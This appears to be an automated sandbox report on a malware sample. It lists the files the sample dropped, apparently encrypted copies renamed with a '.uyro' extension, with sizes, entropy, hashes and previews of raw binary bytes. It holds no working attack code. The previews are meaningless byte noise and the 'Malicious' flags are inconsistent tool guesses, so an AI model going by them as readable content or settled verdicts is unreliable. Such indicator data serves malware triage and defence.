Preview:	...@.=..'&....[......7.s....w..;..H..@.ag....i;.F+..S.....8?..=..$\|..N...D......A.:....G.............y.1kn.&....7....!t.pO(...8.LUu ....V....b....}o.S.2$Gz........o......P...#3....,......\|....u...M.M.h..._._..$.o!.g.dt.r}.,.. .g...d..f.i...j#.w.rH.(....1.66.W..jp.B/.X;.as+5....T.......}....G.$.V....E.h6.Q ..c...T.V.....11$...[....R{.._6...?.[56q...F6..+W..o...;.[].E.@X.....8v........j0 ........It.~..../..-..9+V......U.:.....\|..(..P...5.g..w+{.G.....e.4....j.3.9pE.M..%E.....n...F.\...A.8.a#.$..\|..)l...t....%...O=.?;D../.F..a)..t...f(,..QBS.............y\|?i....Np\...!.$bW}"U..h\|.'....ifnm..st.b.?.b..7......@./nWE......DFT.C.B6....^...f..D!\.Po...Tu.Y.E.1.~$......DQ/...u..../....~#'....m).~.TN7....^=f.5/.}^s.".Q..q-...l.qY...-2A.......rb.5G..7..d..........T...<.ds.......v........{X...2!.\|.-}x.P..*G..5..d.$..q...'sr....#Y.1...x.6..[R\.f..E.5+5.+..}........f.Q.g;..3w...y....!#>..:o.....;5}...)...(.Y.ulj.e..0.F.7.s@`N..).......Z.....a..c..{K

C:\Users\user\Local Settings\IconCache.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18296
Entropy (8bit):	7.988657311597812
Encrypted:	false
SSDEEP:	384:9Qk4Kqfac/W+6cfC0RupGnDCpswxKRtocMppx/Q+n/Ufj:9PxqCjcqquyDqtYRtocMpt8fj
MD5:	1687E79B59F47F0E5786C181DA45FBB7
SHA1:	D8B4BB4F2B9E492E85BD8FC99780F0D4375D8027
SHA-256:	64F8B5DF1B8FAF64E58E10F89823818E338A066D623AB3C15CE126912A61F207
SHA-512:	FE22A926D788128C4D6ED0DF73B6B380E966F2E6E489762A9DBE61F6052577FC0BDDAA42A21F332DE351607B0FC336572F0E7823A88EFB1B657AC505947A95BD
Malicious:	false
Reputation:	unknown
Preview:	H...W.,...U..?..G[d)..>1....CC./..I..H.,_.=..O......&p.x........'1........mW...j...1..#?....W..X7.^.....B\|C.#{.+(..b....u.`..~W..!p.S]q...H..y..k...9..I..w$..lF...0.U..Q...1..,.Bn..hS...0.f..!..q.iy...g".rH'.D....rG@5..N..+.-.3...u]...G"....C.eW.%....0D.x2!.\.Z.W.....!j=....zT..2.I^a......./..Ug..G...KrH....v9..J..rr..i........Ne.':.%.0.......}.Q..{:..j.....Ku......\h.PO.E......@ep..t.EZ...._.<.n.az:Wsn..K.]8.._N....c<AgY...2.L.m..V..."<.'...O..6#....#...B..;vMa...iE...[.....o@.m..{t....`.3..2.R.O^...S3{>......Q.s..e...4.3../....H.=..G..{....I..".\...[....?..S.G.K.f.z.o^..e.PX.Dh...._.......E....t...inJA....W<p....# }...+.].]..........i.vq.w`P]M..".o6..W1.l[...pedR..j..q..G.p.g.h.k.P..V..=8..'.N....@8/.......D.ld.R.n..C.C.1#.?nx..b+...Nz....$..n.......hL<.%.W."...N......q..f..A.[.......:7...o. ...*......@;.{.......G..K....19p1...Gu......Wk.&YP.D....n......8...2M....p..\|v.T.s....r._.@y6X..f.....o3.&.....AY.KL.-.f:S].$E.\.

C:\Users\user\Local Settings\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	537
Entropy (8bit):	7.548926528026075
Encrypted:	false
SSDEEP:	12:QlKPH/PMFrm/ZskGhJkbjW5okNUaEHv0yQWgAldtcii9a:Lsm/ZecZaUgApbD
MD5:	05D38523CAFBEBE6EBB274416DBE166C
SHA1:	F9A81D70F04E2B94CA832775F4707B735F788C29
SHA-256:	32C8CBC6523373ECFE8A17EBF04D8F8FC1C183D8E42D55C1662A5CB61D9DE080
SHA-512:	50685788E076A9BF6CA547C0132161A0941C47B45D8A870878C61916A7A90D7EF6AAD0AE6B923B4359012D1F5A763DC14F988E0C8BE6A9A5DCEA62AAD294B5B3
Malicious:	false
Reputation:	unknown
Preview:	1,"fu ..a:...........=M"l..%./r.M.!(qB.\E.....-.A\..+6U.....r.U.b.tN...1....^.%D.V....=Be......p.0z..S....#.....=b..P/...[.f,".j.N"...O.+.JF...BV..........W!..5".W..P..._Anc...)..J.-..\|..........7a.<FL4......4.s.1R...x&B.d.v#`u!.......^...........d..&.I..S.).gi4...Q.8\...A..V....?Y......2c\|ns%.O..q.^..".0?k.J..".9........ESZ.14.nH...b..>40...>.\p.w..S.l..^#.>K.=@......{%...y.(.f....#.)...i#y.^!;../..b_.>.fMC...d..[..9=.37....L...O$.S.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	7.360185954216639
Encrypted:	false
SSDEEP:	6:QujwMI4q7mi8OWyAM2Wrb9kuyBUv8e7KZVeo80Z06vXMICJ8VkDGxntHcii96Z:Qkwrtmi8jmrb9zyBhbH3/h8Io8Btciik
MD5:	D11CA32ADD269F8DF99258B64CAC5BD7
SHA1:	A8B55C036EFFEB52DBB764CA5E936A98A321A241
SHA-256:	0FAC78C28DF0465A2864AA6FA988BF3DF5338C200696B098064D234F8469CC04
SHA-512:	F8C6EC5D21822D7512C2611286235D07EC67FE8A58129E56DCFB161F88D8620F00760620DE383CB6A2392677F4EEBAB12D6FE6285F86F9BE84230031450E6A5A
Malicious:	false
Reputation:	unknown
Preview:	1,"fu..`.......).Y...LiC.U\|}..O.W....6y.`!...D.!M...n).*t..y=....D$.N.....o.2.#.>O..j...U...[i~.X&.J.Ns.D><.....=0+.....g..`..pr.[.N...:\0f........t..Cw....;.m+.k.....x....,........l...F....,..%.c.x...@..n..O..Q}...n.c6%..y.A.s5RtS...i(o.Zq..^../:..w..<N~.d<..>.&NK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6137
Entropy (8bit):	7.969986613934111
Encrypted:	false
SSDEEP:	96:KsR1WV426HVpu7LXVp0A3YfeUBUbq7eXblzOjdmOslc09/szu+qhQaZJ0b9:04bHVonlpn3Y25bIjh9C+qmaZKb9
MD5:	610F49B34979023C36409C2A8E903DAB
SHA1:	18AAB99005D9EC2051A2E465EE14156E038D17DB
SHA-256:	FF90912B9C4213C5DB5A28D428EAE200719F84BA42CCB351427C4BE27C754EF3
SHA-512:	A8FC0100D89E4D849508D56F42B0CF661E6B2A6EFF0C2A6D37D254AF99D67C6645A038E9EB2E8B917901CA0222A13B54D79F13AE0F90749664CC85CB7E485CF6
Malicious:	false
Reputation:	unknown
Preview:	1,"fu...n..~`NU_.........\2.....+.;l..,.ES..JIa.!.TJ..3.\|.Tf..m}..,...M..g.{.`..[..=...VcT......\]Y2L..#... b.5 ..p.o2..]...#....=V.{#...O.Vd...;.@.O..9..+........~>.......T...E25.sI....'c...O.....,rY.?....&.Oq.....'&........%J....."%KJ.L............c.....-..zC!..7.....l..R.09.4xaM4iN....f$....Spo."S..hL$...2.h.L.mD.S..B.5.......1H...>V......3c....d.U...I.w.+....-.gb&tS\........md.._... ....5&f.....#+v......fY.x.t,.'....vO...p.A!....D..x..=.e.n..._...]...8o../......?..........R.kV5..[%J+.Q..j........03:B......?-.p.....:K..T.Y....QQ(.O.;[....#!.'.^$`Za_.RH...uY{...1...U....J@;.iFy4....D....$`3..K.^.a..d.)..U. <..I?..1.3s.w"....o-..?..[.....X_....7P...?.X......-I..zx..<..K..}W.w...i..v...K.?..Z.....`^..h..T..P.w..'..=.....f..`5r.nR.../i..Fp.';...=.;...,C.Fk..\|.,..+#.a.O.S..m..~RM..,p...n...]...z@...v1_......`..<..s.4...@...3]....x......i9v.m..8g4SR7..SM.w.m...;. ...o>#....r.....?....).`g*.%........@.c:...3....I.......E6./.62..w..)...U

C:\Users\user\Local Settings\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	7.753429729080011
Encrypted:	false
SSDEEP:	24:XMWxXV8mVC2099/BU3q/Js7piy+6cVXKDuTmkDic9bD:XXxX+mVg/BU3qBUpX+9JJf9D
MD5:	7EC1DBCAE5E0927CEE9A1BE7D1975C1E
SHA1:	899796FDB5383F32FCBB3D8015FDE0D30A00CBF3
SHA-256:	80842D723128BA755171BCE4140C2AF8F9BA54E842A43E3FD7EE861536BCF471
SHA-512:	FCFC6731A4648A56C3CD65D785B631AE7BD543169EF8F55D2CD3DDDA454953E11176DDC2BF4FA3E854EEF1F99E294E1E145A9E76A6CECC0FFA23D212091FDDF2
Malicious:	false
Reputation:	unknown
Preview:	1,"fu83.v..y.9.P.A.l....[^j.x.u.Y~...W.]..B.........8./.....J....^9..+....N...m.........<kRv.[R...z.V.0E....Y._.N..P...M...=m}.w0;.!+..1.......l.hrr..&Y. .......?h..U..\.L...{.-.....5...R.....#..yU..n...z.........X?.h.>...:....XnE;.3u.\.........GK.]......U...;y.4=;.".L..h...D... u2...=...Q.......4&.....}ON.I......X:.....(t.U...,a.0.;...........K.....)...2j....~.xp..E6Y....f.~.s.e........W.....O.!....U...A.U.WZ..+.4.V.......DWz.H5.x50.Irx....V..d@l..v.4r....j.ht7e.jn....`.G(^SL.o...$:...K.L...1..."(.sx....G..!.%.M .O...RC..1..L<.0..eAn..97.A.F9.J.W'H....%...9O.V..2w.tf....X..{..Q.I.....qdRw....S.{#.+.s.U-M$1.Q.$.o.......`....7.....T.j{?...KB....fJ.E`...7f....L.....>.I~.hb'q8P_,.........!..d,x.Sk."...G..P.7....&w!....k..SD.....TK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\CLR_v4.0_32\ngen.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	667
Entropy (8bit):	7.681109403281856
Encrypted:	false
SSDEEP:	12:/k5Q8ESbk8QZQo33ZAwJyvYoTb9ekXK+wSvS+9NDbpwQwFcyISFNHtcii9a:c57E3nZAwJ+vTb9eOwSK+98FZFrbD
MD5:	F54F1385243622C29B327CB22C7D5275
SHA1:	0752C9D32A7C677C02D10B4D2BB520145D668F24
SHA-256:	D6286EEA30083206B996A29675B8DE311D5C28EBACE396B884EE2B5E5B4139CC
SHA-512:	A077756742A82B888275AD05B9BCF79F58538B6B6EDB2B4EC9C04D241B15C69FB3FBB8391C946937AC8214BF243A41900C1B41B94425CF3280AD0E83A9CB96F2
Malicious:	false
Reputation:	unknown
Preview:	.To.b.....y.>./.......Z...Gc...p.9"..F..@.2..lc...y.+.Y...H..Q4.......-4G.".f.s2.8...ZQ..-...z..K.f.R-m....{.<^.+..3f.@...@......).$......\|..6&2..._.M.......^.5.;.eX....^l...U.@r..E......_.X.s......Oe.j+..V...c.Z.f...=.sCb..A...RP-..?.g.@z[8...\..}....)..t..g+d.N.Y....I...J..,.c.M8....H..e.!0.#...!.u..{Ynd]...*0...x..C....\|..kv%....H.....@.\..U.[-....I.....)...../.-.3U....d..qBd...............=....U......fT.....).J....5..y(..98.O.Q.tW.~.:!.J.0..[..r.......3...T.`&T.........[.?_5..5[..(W..\|-.N..u.h.P>.rg. ...=.[..=. ....6;..a..IM..../n...............j3..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Internet Explorer\DomainSuggestions\en-US.1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18510
Entropy (8bit):	7.98898587664022
Encrypted:	false
SSDEEP:	384:Ii1k56iHYAk5VBGstJpDDSid6kKAgzsKFC8Tjsm/cy:bSFJSvGsTpnjOXzs+htUy
MD5:	3EE52711A2E802EAC58E2157010A51A1
SHA1:	0917083660054862459202FF178805FC080DF3DF
SHA-256:	9654571600D439D730337D7D56DE21EE2D3BB89530ABBD638E8709292EC53224
SHA-512:	A5524EF05DE9BA1EE4DF3F1AEBD709BD261B108B64807773D2474C61D3D6AD5035CEFE8F7123B80FE5A29FBD64CE3362587D2876734DD885F788EF2796445AED
Malicious:	false
Reputation:	unknown
Preview:	8...L...v<UV....(\|..g./...N...O.G.w.....\|.s..s.....c...Kfr....=...f........<......~b.......Tc{...mM..Yz..ns".R..).If.. ..S9{B..NIL..Q.........p~.I8.C..~..>~_27.....i..v6S......=..M...........Esk.....W;....l .U.4.C.U?....g6..]}.)+..l..).q.z..l.-.. ...E.....p.4.....z/.v.......P...,.n6A. .r.-..V.................p.H5Z}IM?l...5.1.+.....)..m...Q.j.-.m..1..$..Z.........=]Rv...Pt.])..Zq...HC.uVL\&.6...Y.t.v...Q.E.x..,... ._k........H....Z[.bsy.O..X....{.._....n......9.v....R.!..f_...O..."~..dN.'.3R).....E.5.a..>eU..jew]z8....R(.m...P.@.8.M...`.,...9.....@...ZB.8M..M...!...V..al.J3.b...3....w.d.b..._/....zF\|p~hW...fR...U..y.J.4...k..#.i.&..S....$..ZMP..6.m~3A..an....M.(...O...Y...+A.@z..mM.I+..aQi..9.s.K......v....;+.."..7P5...........^........0...\|.1..QU....B.=......?.4..._>c0..nC.....~.$...S.$..._t...Q.O...p....5........ps..Z..9.wc!.T.>jxL.[...u.3.$.B....mt........8..~.....W...Lgr.....Wmg..c@/a ~~r....(...o....ex...\....1..k.~....

C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	234061
Entropy (8bit):	7.512176126745377
Encrypted:	false
SSDEEP:	3072:iBNnI6uIo66ftg6cYUIXKLjJYyb489RNkXQb/Le6q/By02r:iHnI6St8PIXU5RN/Le1Jt2r
MD5:	B0FCB585B2DFE520E81A2E7342BBF526
SHA1:	AF0A9176C8746C7B0EFEDC811879D4F5A769F361
SHA-256:	D3F8F1CA7538635A42E02A6DF08D228704B644542CB87032E263F39FB3C1DED0
SHA-512:	68CE314C0E629EB2B6C5C0A799F1BA8711BB3648917E17DAD10DA43F0325FA6F83DC58A7B97F0924033E1C54E8760798090DFD29E994AF0909DF86FA1C8B6A18
Malicious:	false
Reputation:	unknown
Preview:	.<?.......(E..o...I7..\|]8...\|d..?i.~..h.%...V....&_O6m.T.!..w..%PK..0...uq......U._.D6`.s.............y....-............._.Nq..X.(H..b....T/f#..3k.......c]N.S...r...zQn.4J.;.$.W"... .$.U...>.BJ......[.~d.Fb8......D.$....Q{}..$....ek(.l.I...)E.........L...U}..i3..w.S..(5ex.6wT..S}.g..r.]..@..\8.^.@:.\|S.^.....B=...>......]....:.2....oe*....#J)....\:O.2..] ...(...?(..g.@.....D.6.E;.. \|D.8.M.LO.......\|.T..c.M,.....JL.9/0..X.E.....+.jJ....P.:,....I............;...... ..\|.I..L4.J$c3.t.M..QR_.9,.2N.z.w..M.e..][..0.2.....6.n=.....U.......V....`.a[.Z......UL.3..q...P.%@..m":.~.b.?f.7.Q.'ZNc...9kN..&2....i./.v$...f.JO........,m...v...\.......Xe.....;u..#...G.\}y?..@..~...1.......E........./..YE.A].$9.9m_BT..1..<cE...#.'NB..-:.MLv..q.e....V.'A.\......$E..A..a...4C. ..p../....}.....D......Tn....@m.PH@\|L....hD7...R0RuP1..h.@..q9.Wz.F.n(..E.l./...^<5..4..\|.;.uy.}6:=..E..Y.7.\|.......@n....fJ/...:.q..;0M<.=8.i.9.Fj.[P].^B.gS...J..&P..-

C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	49454
Entropy (8bit):	7.99615692743123
Encrypted:	true
SSDEEP:	768:Xq5mJDqyUSSZJIoolRu4T+pHoU48HDdK5lAYSmIEsgPQNUqRDkPq0suIjJV:XImJWvZt0+6UFHxK3FhIIPQNTQq/1
MD5:	03E6C42C86D106BA7803B2C4F37792F8
SHA1:	5696E3B1A19CD40E953EDFB525FCCC802140D57E
SHA-256:	50081FDA7DA68FA5925CC357164460C30F105CE0E1DB8ED9D7FCF7069C40A862
SHA-512:	43951044B29A26DE24C7286D5A2DAE2FA6D3F3604EB06191450C3E96CBBAE3BA7CEAED23754CAFE0528F5589C289647DD3BCFDAF0736928EC6B2DF12D91C7A0F
Malicious:	true
Reputation:	unknown
Preview:	.....E..X..\..p....w..J..'.....E<l...{b.~.".C....K..V...w.Y.(p ....!.].... 5{...N0S..TE.h.g..._..~C.....,.cdf..?.AM.y7......m."..+..B....mrOI2Bh.V-!...X.`(..m..v5...CU...E..~.....]<.+.'.O.A...}.iG...%oSl..I.....L..._.>.....L..f...+.;9.zt^j....e...u[.....Y.i~.Z....Bv.D_.b.ie..9.c.1^M...n..a...e,Y. .....o....E.y....R7..e.E..W.;.`..G.>.7.s@=D?F,..\W..2I.:.~.+4....r..~../Q&...0......l..<4..7....\|..)....a.. .(...V.<.RQ......1,...(..Ba..FLW.K...P.].8.B.E.hL. .d.=....]..Z@.V.%6..\|2..:v9.3..Xh....y:.5.y0"...]....e....^`..XIh^.,....)......D\.(..(g.7....[7.ri.......X.....'.>t...V......?:.^.h.zR....8.Tkv_h.....k...].&Jh........}...mt..`.%W.y<^......z&OK.{.......m>.2$.g...].]oWyy7.'..L.}P...!.J....v8..6..tc...^...".V.?-.<'.~...S....l~0f=R......=~././!.......Z.w#.f.60z.9....V.........c+..[./h....w..R.~..bG..>...I.......O8r.:....QE...^.G.*"5..........wyH...q........ur...........^;e.x..H..^.N5.%.}....^..4..!lO./w...w.8+..D+.7...b..g}..].7$.1q.5.{..?.

C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	35951
Entropy (8bit):	7.994429666223941
Encrypted:	true
SSDEEP:	768:qmeMTWlmMkD4gKi9yQnOM4Spzyf3V0swAeadCeE8BegOMweyghonjqGaGruWu:q9W85i91OM42Wf3VQXgj/GHruWu
MD5:	B64F56483AB02C9ABC3F0ED585A87535
SHA1:	3F2265D77188670DB8346675FAAD88D48A5175F8
SHA-256:	98017C9079A915C55C8558CC4B1B13BC64A828DC4488C1941C2E19DBCB99C4D8
SHA-512:	CCFD036980B082F1FC14D5D6F6E342A7A058C66032E7470D4069281239E2331B2AC80C738CDE41A5E4E6CAD85B0F55ACAE2A7DD758C55121B5E4C7C706DA0561
Malicious:	true
Reputation:	unknown
Preview:	.....;v.u.(...'[...@'.2A..,...r.....'.J..A'e#..S..=......r.2...}..W.^.w.X....... .<>.....s.z.l....:((f>9....>.].t...g.i......=..f2..u.~m..=...M....7........J..S.R.,.....d..Ox...}.j.p..12.E!..l.}.\D...Y.n.V....Z...U.AB.\....w.......j...U......~....T,.e...e.;..S$ ..EH..p..M......XA..d.....)..v:.#l._B.q...'.=..$%..aWj......#qp..YQ.0.v...V..}.WW?US.U....=Ju.9[,.wX..\}....u.....U$..Jxe.&..+E.../...av"....i......A\|\!r?..........U..\.......>z..jC..F..u.y{..V.."......k.Q....-$b.....1..$..s...J.... .C..r.EA...X\|0.X........(..7..b.=@.xT.ru...F....!7.b.)..$!..).9&XM.......XD:...=:.iHb..XD#Y...b5.....F&U.s..\.._.8....4.......7:k..)1.v.#4.....q...u.....Y.3.....Z/.&.\....r....\.jpE...Q...Ps....h...;\|..........9..A.......4.l...evCQ&..b..c.,.p3..\|......{c.y..2....{<....%6.>.!EDq.,).`.X...+.....:X.I...K.W.5...#..<...Z.........-...a...d..H........w>y+..B.o....V.\|..\..K.S..*RH...c^..<eil.7.$d.o..g..WV/..TA..m...S.j..=....6Kw.....c..G+.=

C:\Users\user\Local Settings\Microsoft\Internet Explorer\VersionManager\versionlist.xml.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16179
Entropy (8bit):	7.989520664616215
Encrypted:	false
SSDEEP:	384:xQZSZl2qVAfFoI2zkezXD7ZyOA9mjmzgV4+o56CYEf8C4pHbDJaxy15jW3:xE7GA6ItezXEG3V4++WC4xbDJhA3
MD5:	D246810F09FE5604F6EF5AED9EE2E799
SHA1:	96C760B0495ABCE1549E8D8D13244E07BFED3A65
SHA-256:	434EA406AF30360142D621FB15FB282DD1D30B488E2029FFAFBA790045FCC2C0
SHA-512:	19C510D464A7B736C6BAECFA22D1389CAE13C7798443F204E57875057732071781E029C9A06CA5F1EB97AB52A0B9BCFBFAC7ECCF15C61750E24CD003C85B15FC
Malicious:	false
Reputation:	unknown
Preview:	.<?e.}n.]..~(...!..ao..#.5..0..'.&.kI..@..M....x.zQ.+....."b.I...By.5/........P<.,<W.$..h.z.^.sco..g......M.W..j........m.."5(D...5.6J..\.~.S.........GJ...x/.k.Z..&:i_......L..&.,Et6..cjM.....v...d].j.@..G&X...A..6....r.K...d9U..?o...>..]...?c..2a.R!.(.....<.n.!.@}d.o)....$..[.).&.OvE>.w.).n....%.......)9J.~..@....t..N... ,(...5.ws....G...S....e.}T.....u=X.W..$......9..%.._n`5.....#iM.9H..9.z.,.u...)......t.B.09..'..w....8...o.0E.t5.NG.!."..sCr.h7.U.....0.qa..z.....+....:j-0...=.\|.N5......+zO.l....;...w..S.n.xb...{..!..b.k.1.H...VY.~......[....(.6.Y...V.o... ..s.99aT.e...l.9..#.=,..ICw.8....9@.......-.F.&"n.......y...v...J...1?.#..]>.%..H.9M^a2.`...G.cT..f...`..{...}mdC...W..jPw...~.}V.....A.......~.....g._\.G.rx.v~3..#NI.....d....4....%..Q....[0._.T6\|..qW....> .RDX.........H....@KS.B6,:.h......DBh.5.L.3T.#.9%....!X=...61.......n...t.%.x;T.8.<#....o.Bu..cN..-v.d,....OAy..) ..q.....5...$..O....!.o...%fk,.mj._.....y\|..w.R:...

C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6907
Entropy (8bit):	7.974125455698889
Encrypted:	false
SSDEEP:	192:cIJTOEi3mtH5K+W0/dlpWbJUyNRK9aKeA:XJTOb3k8c/5WHNMazA
MD5:	92DF82612FEF432B04F657C5E6A8B10D
SHA1:	672F16CB63D0E2809E149EFE3C35F4E085E1B854
SHA-256:	C3314C77E478272275EABD23121184EFE5FF8023B559041B041B8103CF6EC659
SHA-512:	37722B95F246BE2BEA573D53CD951BBA7EE3B86AB523A56B536D3031B3EA4C173D04BF33B9A33525A31C6266A9B043157E19C9A211922DB25E18897D5585F4B3
Malicious:	false
Reputation:	unknown
Preview:	06/27b.b..)&...>E...A.m..w.z....[#.+...J)L.X.M.....z..Q.!&......(..-+\}.1...s..<M.ngX......7.L.6%.,..+.`..J5....^A.l9b. ..{.6......Z..(.w.R...e....o8.....b.....7...+. }].&..E.'ZP:.\|...N3m..azY.....$.~.......Z-Kj.......AV{z.d[...9...\H.^(.....N.....`U.\j.O.....%]SA.NE..>.z...41Cug...AD$.a.6R..9.+.).,.np.........`...;.h.a..<...1..;.o...g...4...X...n.9.H}..ecc.s..j..n..&,.9z..0....U...d.......C....RN.....9O%+......VZ.(.....Z...kR..D.{_Dz...n....D.M....8...~e....5#....+...0.P.R.Q....y.Q...o(....W.kL...Nk...J[.......e.v[u....wY....1.F.."$3..^..kd..w..[..M.Y....&.N.#...w..r.eM~..JK.;......X.W.. d...'B<e.'.X.;..S.H.ex.k'.O;?..}[t...7...}.jR..b.......d8...p..Q.?.\|....8..x.<.n..ZQ...W..k.+...H..J..a.<.?p.%[.M......i;..yS .7@.....i.i..45.........-.K...[._.n.F......m=*..1.........z\\...b....7.asq..dC... ....s.. .D.........<......+...US87....^.......>......MX3...e.H.^...a.FS...l.hn$....e.c1^_...j]#....n.$q....8p.O...).g..V...0\.h...WT..E.'Rb

C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	7.717942608995989
Encrypted:	false
SSDEEP:	24:QGetwPt7Ajdviu4HLj7wyrouKRjIcmpbD:TZgvius/wPuKBfmJD
MD5:	475AE4D93C552A94F5E70A3272A52B87
SHA1:	46525DD0C62AD11602E5F15EA5CD91657659058D
SHA-256:	A45BCE88B41E465DD791ECCA90D1BF5537C3D533FCBEE480214ED86D012943CD
SHA-512:	B64968EA823F4CB5380AC3231E8998F2F9E8BE9E54709C98CA52A6B40BD6E4E803C01C359D9D031D375A2253B5C132CD43239729B85B12A98BB7D013D5C3D003
Malicious:	false
Reputation:	unknown
Preview:	..0.6.W.}\|zY.)....)... ..x..'...w.Y..!.......R.O.t...v...\|.q-W../......hA.c..0...7\1f.#.ikX.F.DsI.L....X....r...,.M..@.z.&.}..KU...j.=..4.\|].....A....0...w..`...^.....Z9.^...X.....k>..0l+.Q..q....>V..W..-A.7.C-......B9..}4.\....^..D..r.'~.x...4>g]]n....L.....hQ...x... .}q...;...7...B.V.R..=XJ...ZL.6..3W\;..P4..N..#T....{..X.pgl..2q..>u.d]........:w.D.s+..a..ln@....4..3...a].Y.C....O.S...4.s7...W\Y.PcRD....]....+..@C~)....0...u.i..R`W..t.(.VFU....+>..9t.9F.q.G.....:...\|...,.O"Yp/M..y..7>.}.....!_.....:.....u....,.QN..g.....B..4c.....].v..7bjt?.R..v.2..........Z.h\|...)U{..a....D.~..6....7.k....q......O^.PG..d C...[U.y...v.j..~$E..z%.I..wlo.L]a.....m...uJ.._.g...). 7<.i.N..#:...B.n,..z.U...#..Jud#sO.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1648
Entropy (8bit):	7.865877170487207
Encrypted:	false
SSDEEP:	48:/nMvHI2IDB9J0KtdGvNJ4jpBI7sEETAVf2r8KD:MHZIfJ06duYpBI7sEETAAr8C
MD5:	E90193039F7E00EE13B3ABB9836C170D
SHA1:	033E1421E5B8CF0C915DE0A8502C8A09BDE56CD9
SHA-256:	A9D8E3416CDBCEF9CE23D408D7627318647A404FB7A960D5868BEDFBE26C554C
SHA-512:	4C4E5BA2CE068C09371DF621714F08720BA744E77C21C2DAE39E32B68D4010D7B4AAE7F81AF9DBBDCB89418A061F5FAC7EEB092DC591AAC9CE67548BBEECFC23
Malicious:	false
Reputation:	unknown
Preview:	..0.6...k.1.TE....Ff.Uh....[..N.p.}.1h9.<...m.?......W.m .!.n.P.....aa.E.AX\..`s2A..\...j}..1...au-......f.&.b...q[....j.....F.n.d..e.=!ETN.O...6@....x.Cx....TQR).....T.Ihz..e.........jj....$K...E..B...pKT......W...U".:...f.X.]J.!.vQ.....l...l.j\|K,.?K2[.....W..........s.)}.L..C.BDW.i!..{.5oS..;...$.[...7./..MY\|.I. ..Lm...t./._....C..#P.....o(a9..m..U.!._a...@B:./ ..rh..Pf8.-.'u...w.....H..0u....7`,..i.V.V...TQ.q....}..txK.;e.+.^..........gj.._...q./..X1RqM.......p..&......z4.....8.D.q'.C.M.Zx36.s\..#JB.;.P.z..&..n.f..G.....%H(....`....=9.x.../..a....P.Pf..P..v<...A7x.3.L..sV.+/S#..I.....O..<...(...7jz.......I.X.D.a...n.....u..3}.7...!.j.{...Hv....}...<...-XM...1....a.......M.h:.-.r\|&R.....aZ2..p9.0.k. \|.c....]..KL."..D.T.8+..A..j.E..\c..{mF.6.c.._.O{.G.vt:....q......7..<.Q..90..a(yQ...........>..E.....9~...\|.Bc......e.y..;g...../..".5..1^....a...@D1K.5.......BB.M.y.............MpW..m.%$.{..a. .....Y.yf.9.f./. b...I.r...X.D.<r.f..&

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\AppBlue.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	10576
Entropy (8bit):	7.983210054236107
Encrypted:	false
SSDEEP:	192:2s2OcbYgLtGfSpKmKhHlsregDzHtWmELNkxk/2ffi6hD2fD2m3ufwa7SWN:2LpNLtP90MPHeLaaaK6h2fDXs7Sc
MD5:	B7BD9F1ECC06ADA44520C513B55EE549
SHA1:	3160CC7AEC51BFF3064188B5D0C1CF7875C3EF1D
